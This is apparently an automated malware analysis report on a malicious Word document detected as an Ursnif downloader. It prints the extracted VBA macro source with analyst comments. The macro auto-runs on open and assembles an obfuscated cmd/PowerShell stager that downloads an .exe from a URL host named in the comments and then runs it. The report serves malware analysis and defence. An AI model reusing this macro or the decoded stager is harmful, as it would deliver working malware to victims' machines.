Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 37ac0ae44ad4df57…

MALICIOUS

Office (OLE)

63.6 KB Created: 2018-09-11 07:25:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: 672c5fc0dcde72d0c95a054b90173104 SHA-1: 7b7610065b0dfc07e727174bda81a22fd78946ae SHA-256: 37ac0ae44ad4df5711e66381b6ddff7a4557ae16df2f6d51cb88220648f2d4af
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File — additionally supported by the decoded macro strings (see extracted artifact): T1059.003 Windows Command Shell (cmd.exe /V:ON /C assembled via Chr() arithmetic), T1059.001 PowerShell and T1105 Ingress Tool Transfer (reversed "powershell … Net.WebClient … DownloadFile" fragments), T1027 Obfuscated Files or Information (string splitting, caret escaping, reversed payload).

The sample contains a VBA macro that runs from the Document_open event and ends in a Shell() call with the window style hidden (Format(vbHide)). The Shell argument is never present as a literal: it is the concatenation of two helper functions that build it from dozens of short string fragments, Chr() arithmetic (Chr(99)="c", Chr(67)="C", Chr(34)='"' spell out cmd /V:ON/C"…) and caret-escaped cmd syntax, padded with no-op VarType calls and an "On Error Resume Next" split over line continuations. Decoding the visible fragments yields a cmd.exe delayed-expansion stub that sets a variable to a reversed PowerShell one-liner (New-Object Net.WebClient, DownloadFile to a path under $env:public with an .exe name, Invoke-Item, inside a foreach/try/catch over '@'-separated URLs) — i.e. a download-and-execute stager. This matches the ClamAV downloader signature; the Ursnif (Gozi) family name comes from that signature only, since no payload or C2 traffic was observed in static analysis, so treat the attribution as signature-based rather than confirmed. The second helper (jGNzaJ) is truncated in the preview below, so the final URL list and drop-path should be confirmed by fully decoding the extracted macros.bas.

Heuristics 5

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — this is the standard Office DrawingML schema namespace present in ordinary Office files and is not an indicator of compromise. The real download URL(s) are assembled at runtime inside the macro (reversed, caret-escaped fragments) and therefore do not appear as a plain string in the document body.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4924 bytes
SHA-256: 10ebc19bc9ca9809d86eb4712a2a852018668ef14ada763dba7ad839eb379976
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "AfjHDnoZRiQa"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Auto-run entry point: Word fires Document_open when the document is opened
' (T1204.002 user execution -> T1059.005 VBA). It is the only trigger in the
' module; no AutoOpen/AutoExec alias is present in the extracted source.
Private Sub Document_open()
' "On Error Resume Next" written across three line continuations: identical to
' the compiler, but a line-oriented grep for the phrase misses it. It also makes
' the Shell call below fail silently if anything goes wrong.
On _
Error _
Resume _
Next
' The VarType "..." + "..." statements are junk: VarType evaluates its argument and
' the result is discarded, so they have no effect and exist only as padding/noise.
   VarType "BSDYjI" + "342876675"
   VarType "pXw" + "rrNB"
   VarType "m" + "2368"
   VarType "F" + "kjji" + "I" + "5323"
   VarType "348409101" + "rYizfWqQ"
   VarType "266795175" + "9240"
   VarType "L" + "i"
' The actual payload. The command line never appears as a literal: it is the
' concatenation of two helper functions -- wiwCK (the cmd.exe /V:ON /C "set jwd=..."
' prefix, decoded in that function) and jGNzaJ (the remainder, truncated in this
' preview). Format(vbHide) evaluates to "0", which Shell accepts as the vbHide
' window style, so the spawned cmd.exe runs with no visible window. Shell is used
' as a statement, so the child PID is discarded.
Shell wiwCK + jGNzaJ, Format(vbHide)
' More no-op padding after the Shell call.
   VarType "446500332" + "NhZM" + "rtQzW" + "155614078"
   VarType "21492891" + "UrJj" + "TMPAo" + "317908301"
   VarType "RGL" + "hzz"
   VarType "8263" + "m" + "LwaSFwWDctAlA" + "jBIzKC"
End Sub



Attribute VB_Name = "LUwwpjzjLO"
' Builds the first half of the Shell command line. Every meaningful character is
' hidden by string splitting, Chr() arithmetic and cmd caret (^) escapes, and the
' PowerShell part is stored back-to-front (compare the decoded fragments below,
' which read correctly only when reversed). Decoding the Chr() sums:
'   Chr(9+5+18+11+56) = Chr(99) = "c"
'   Chr(6+3+12+7+39)  = Chr(67) = "C"
'   Chr(3+1+5+3+22)   = Chr(34) = '"'
' Returns: the assembled prefix string; the matching suffix comes from jGNzaJ,
' which is cut off in this preview.
Function wiwCK()

' Same split "On Error Resume Next" as in Document_open: errors are swallowed.
On _
Error _
Resume _
Next
' VarType lines throughout this function are no-op padding (result discarded).
VarType "YOFbjDSUqODOf" + "DA" + "hizAaiNmiLmiIo" + "JtiXFECqNkOc"
   VarType "6393" + "PvOr" + "234009402" + "NnfE"
' With Chr() resolved: cmd /V:ON/C"s^e^t j^w^d=  ^ ^  ^    ^
' -> cmd.exe with delayed variable expansion (/V:ON), running: set jwd=<spaces>...
' The carets are stripped by cmd; the value of jwd is the reversed script that the
' remaining fragments append.
CjtlTSFz = Format(Chr(9 + 5 + 18 + 11 + 56)) + "m" + "d " + "/V:ON" + "/" + Format(Chr(6 + 3 + 12 + 7 + 39)) + Format(Chr(3 + 1 + 5 + 3 + 22)) + "s^" + "e^t j" + "^w^d" + "=  ^ " + "^  ^   " + " ^"
VarType "hSMrzaK" + "wjro"
' Carets removed: "       }}{hctac};ka" -- reversed: "ak;}catch{}}" (tail of the
' PowerShell loop; joins with the "bre" at the end of the next fragment).
UATrzcZ = "   " + "^ ^ ^ " + "^  }^}" + "^{h" + Format(Chr(9 + 5 + 18 + 11 + 56)) + "^t" + "a" + Format(Chr(9 + 5 + 18 + 11 + 56)) + "};" + "^" + "k" + "a"
VarType "6782" + "454144184"
   VarType "496731377" + "1314943"
   VarType "7577" + "usf" + "lPMF" + "F"
   VarType "qia" + "Fl"
' Carets removed: "erb;ANQ$ metI-ekovnI;)ANQ$ " -- reversed: " $QNA);Invoke-Item $QNA;bre"
' i.e. the downloaded file ($QNA) is executed with Invoke-Item.
GJwrXzQfhiC = "^" + "e" + "r^b;" + "AN^" + "Q$^ ^me" + "^tI" + "-^eko" + "vn^I;)^" + "AN^" + "Q^$ "
VarType "8198" + "191089212" + "5734" + "bojHMNYRitH"
   VarType "961" + "116789934"
   VarType "526698992" + "pjcj"
   VarType "4726" + "CAazGm" + "8071" + "zRlY"
   VarType "rS" + "wkqO" + "11178266" + "zzh"
' Carets removed: ",ODX$(eliFdaolnwoD.rSI${yrt{)jHQ" -- reversed: "QHj){try{$ISr.DownloadFile($XDO,"
' i.e. WebClient.DownloadFile(<url>, <path>) inside a try block.
sHswhwFIpa = ",^O^" + "DX^$(" + "e^l^i" + "^Fda^" + "o^l" + "nwo^D^" + "." + "r^" + "SI${" + "yr" + "t^{" + ")j^HQ^"
VarType "zRZjaT" + "PZjr" + "441099464" + "TWOTGTKPzlW"
   VarType "KEYm" + "998"
   VarType "418103898" + "431106573"
   VarType "9526" + "2759"
   VarType "CCi" + "522924579"
' Carets removed: "$ ni ODX$(hcaerof;'exe.'+bJi$+'" -- reversed: "'+$iJb+'.exe';foreach($XDO in $"
' i.e. drop path ends in "<$iJb>.exe" and the URLs are iterated with foreach.
FEhBFiW = "$ ni O^" + "DX$(" + "^h" + Format(Chr(9 + 5 + 18 + 11 + 56)) + "^aer" + "^o" + "f^;^" + "'e^" + "x" + "^" + "e^.^'+^" + "bJi$^+" + "^'"
VarType "ivKmI" + "726"
   VarType "vokG" + "3354" + "9555" + "269688193"
   VarType "520437300" + "l"
   VarType "jYzIMhTraGv" + "301496448" + "353361702" + "2320"
' Carets removed: "\'+cilbup:vne$=ANQ$;'499' = bJi$;)'@'(tilp" -- reversed:
' "plit('@');$iJb = '994';$QNA=$env:public+'\" i.e. URL string .Split('@') into a
' list, file name 994.exe, drop directory $env:public.
tvTpRrzQcni = "^\^'^" + "+" + Format(Chr(9 + 5 + 18 + 11 + 56)) + "^" + "i^l^b^u" + "p:vne" + "^$^=^A" + "NQ^$^" + ";^'^49" + "9^' =^ " + "bJi$^;" + ")'" + "^" + "@^'(" + "^tilp"
VarType "pqtXjzKEUca" + "2451" + "zj" + "TH"
   VarType "ncjzmzPLtmrX" + "ibzsi"
' Carets removed: "S.'nkt.3agrat=l?php.toksnapo/TTR/m" -- reversed:
' "m/RTT/opansokt.php?l=targa3.tkn'.S" -- the path/query part of the download URL
' plus the start of ".Split". No '@' is visible in this fragment, so the list may
' hold a single URL; confirm against the fully decoded string.
bvRtzTWHZ = "^S.^'" + "n^" + "kt^." + "^3agr^a" + "^t^=l?^" + "p^" + "h^p^." + "t^ok^sn" + "^apo/" + "T^" + "T" + "R" + "/m^"
VarType "wHAwi" + "6242" + "265494161" + "814"
   VarType "9934" + "101702012"
   VarType "C" + "9830" + "3911" + "CYvkLjU"
' Carets removed: "oc.l1efxzilbkpf0q//:ptth'=jHQ" -- reversed: "QHj='http://q0fpkblizxfe1l.co"
' i.e. the URL host (q0fpkblizxfe1l[.]co + "m" from the previous fragment); treat
' as a candidate IOC and verify by reversing the joined string.
zjwMpoSL = "o" + Format(Chr(9 + 5 + 18 + 11 + 56)) + ".^l" + "1^ef^xz" + "il" + "^b^k^pf" + "^0" + "^q//^" + ":^p^tt" + "h^'" + "=" + "^jH" + "^Q^"
VarType "kMPKXYMBF" + "5264"
   VarType "WiI" + "5353" + "2090" + "hVCN"
   VarType "960" + "CNqiXlwoJN"
   VarType "2624" + "nLqRMjan" + "Hp" + "kLkRoVbvmaj"
' Carets removed: "$;tneilCbeW.teN tcejbo-wen=rSI$ lle" -- reversed:
' "ell $ISr=new-object Net.WebClient;$" -- the head of the script. The leading
' "ell" completes "powershell" together with the "hsrewop" that opens jGNzaJ.
IoRpKH = "$;" + "tn" + "eil" + Format(Chr(6 + 3 + 12 + 7 + 39)) + "^be^W^" + ".^t" + "^eN^ " + "^t" + Format(Chr(9 + 5 + 18 + 11 + 56)) + "e^" + "j^bo-^" + "w" + "^en" + "^=r^S" + "^I$" + " l^l^e"
' Concatenation order is cmd prefix first, then the reversed PowerShell tail-to-head;
' once cmd's loop in jGNzaJ (truncated here) reverses the jwd value, the pieces read
' head-to-tail as: powershell $ISr=new-object Net.WebClient;$QHj='http://...'.Split('@');
' $iJb='994';$QNA=$env:public+'\'+$iJb+'.exe';foreach($XDO in $QHj){try{
' $ISr.DownloadFile($XDO,$QNA);Invoke-Item $QNA;break;}catch{}} -- a download-and-run stager.
wiwCK = CjtlTSFz + UATrzcZ + GJwrXzQfhiC + sHswhwFIpa + FEhBFiW + tvTpRrzQcni + bvRtzTWHZ + zjwMpoSL + IoRpKH
   VarType "bwtkDJMlO" + "X" + "fOcTz" + "465334074"
   VarType "165784142" + "JSjFnV"
End Function
Function jGNzaJ()

On _
Error _
Resume _
Next
VarType "473391902" + "6229"
   VarType "7929" + "8159" + "8333" + "D"
   VarType "DCwa" + "krKGMn"
   VarType "5611458" + "8529" + "TGz" + "61"
ZlWii = "h" + "s" + "re^w^" + "o" + "p&&" + "for /L " + "%" + "^w ^in" + " (^2" + "^6^"
VarType "367" + "3595" + "EkB" + "qQFYzafUwiQAG"
   VarType "198121371" + "9048"
TPztjfl = "5" + "^;
... (truncated)